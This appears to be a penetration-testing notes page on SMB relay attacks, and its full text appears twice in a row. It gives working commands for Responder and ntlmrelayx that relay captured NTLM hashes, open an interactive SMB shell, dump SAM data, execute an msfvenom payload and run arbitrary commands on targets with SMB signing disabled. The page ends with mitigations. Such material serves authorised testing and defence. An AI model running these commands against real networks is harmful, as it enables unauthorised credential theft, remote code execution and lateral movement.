SMB Relay

What is SMB Relay?

Instead of cracking hashes gathered from Responder, we can instead relay the hashes to specific machines and maybe gain access
Requirements
- SMB signing must be disabled on the target
- Relayed user credentials must be admin on machine

Attack Procedure

Configure Responder (/etc/responder/Responder.conf) to only capture SMB and HTTP requests but not responding to them.

# Check for SMB signing disabled 
nmap --script=smb2-security-mode.nse -p 445 IP_SUBNET 

# Configure responder - turn off SMB and HTTP responses 
nano /etc/responder/Responder.conf

# Start responder 
responder -I eth0 -dwv

# Setup Relay 
python ntlmrelayx.py -tf targets.txt -smb2support

# Attempt to add SMB share using attacking IP 
\\ATTACKING_IP 

# Dump the SAM file

# Command to get an interactive smb shell 
ntlmrelayx.py -tf targets.txt -smb2support -i

# Once you get an smb interactive shell you have a lot of control 

# Additional commands 
# Generate a msfvenom payload to be executed and use multi/handler in metasploit to create a meterpreter listener 
ntlmrelayx.py -tf targets.txt -smb2support -e payload.exe 

# Executes command when you run it - think powershell
ntlmrelayx.py -tf targets.txt -smb2support -c "whoami"

Mitigation Strategies

Enable SMB Signing on all devices
- Pro: Completely stops the attack
- Con: Can cause performance issues with file copies
Disable NTLM authentication on network
- Pro: Completely stops the attack
- Con: If Kerberos stops working, Windows defaults back to NTLM
Account tiering:
- Pro: Limits domain admins to specific tasks (only log onto servers with need for DA)
- Con: Enforcing the policy may be difficult
Local admin restriction:
- Pro: Can prevent a lot of lateral movement
- Con: Potential increase in the amount of service desk tickets

PreviousLLMNR Poisoning NextPassback Attacks

Last updated 1 year ago

SMB Relay

What is SMB Relay?

Instead of cracking hashes gathered from Responder, we can instead relay the hashes to specific machines and maybe gain access
Requirements
- SMB signing must be disabled on the target
- Relayed user credentials must be admin on machine

Attack Procedure

Configure Responder (/etc/responder/Responder.conf) to only capture SMB and HTTP requests but not responding to them.

# Check for SMB signing disabled 
nmap --script=smb2-security-mode.nse -p 445 IP_SUBNET 

# Configure responder - turn off SMB and HTTP responses 
nano /etc/responder/Responder.conf

# Start responder 
responder -I eth0 -dwv

# Setup Relay 
python ntlmrelayx.py -tf targets.txt -smb2support

# Attempt to add SMB share using attacking IP 
\\ATTACKING_IP 

# Dump the SAM file

# Command to get an interactive smb shell 
ntlmrelayx.py -tf targets.txt -smb2support -i

# Once you get an smb interactive shell you have a lot of control 

# Additional commands 
# Generate a msfvenom payload to be executed and use multi/handler in metasploit to create a meterpreter listener 
ntlmrelayx.py -tf targets.txt -smb2support -e payload.exe 

# Executes command when you run it - think powershell
ntlmrelayx.py -tf targets.txt -smb2support -c "whoami"

Mitigation Strategies

Enable SMB Signing on all devices
- Pro: Completely stops the attack
- Con: Can cause performance issues with file copies
Disable NTLM authentication on network
- Pro: Completely stops the attack
- Con: If Kerberos stops working, Windows defaults back to NTLM
Account tiering:
- Pro: Limits domain admins to specific tasks (only log onto servers with need for DA)
- Con: Enforcing the policy may be difficult
Local admin restriction:
- Pro: Can prevent a lot of lateral movement
- Con: Potential increase in the amount of service desk tickets

PreviousLLMNR Poisoning NextPassback Attacks

Last updated 1 year ago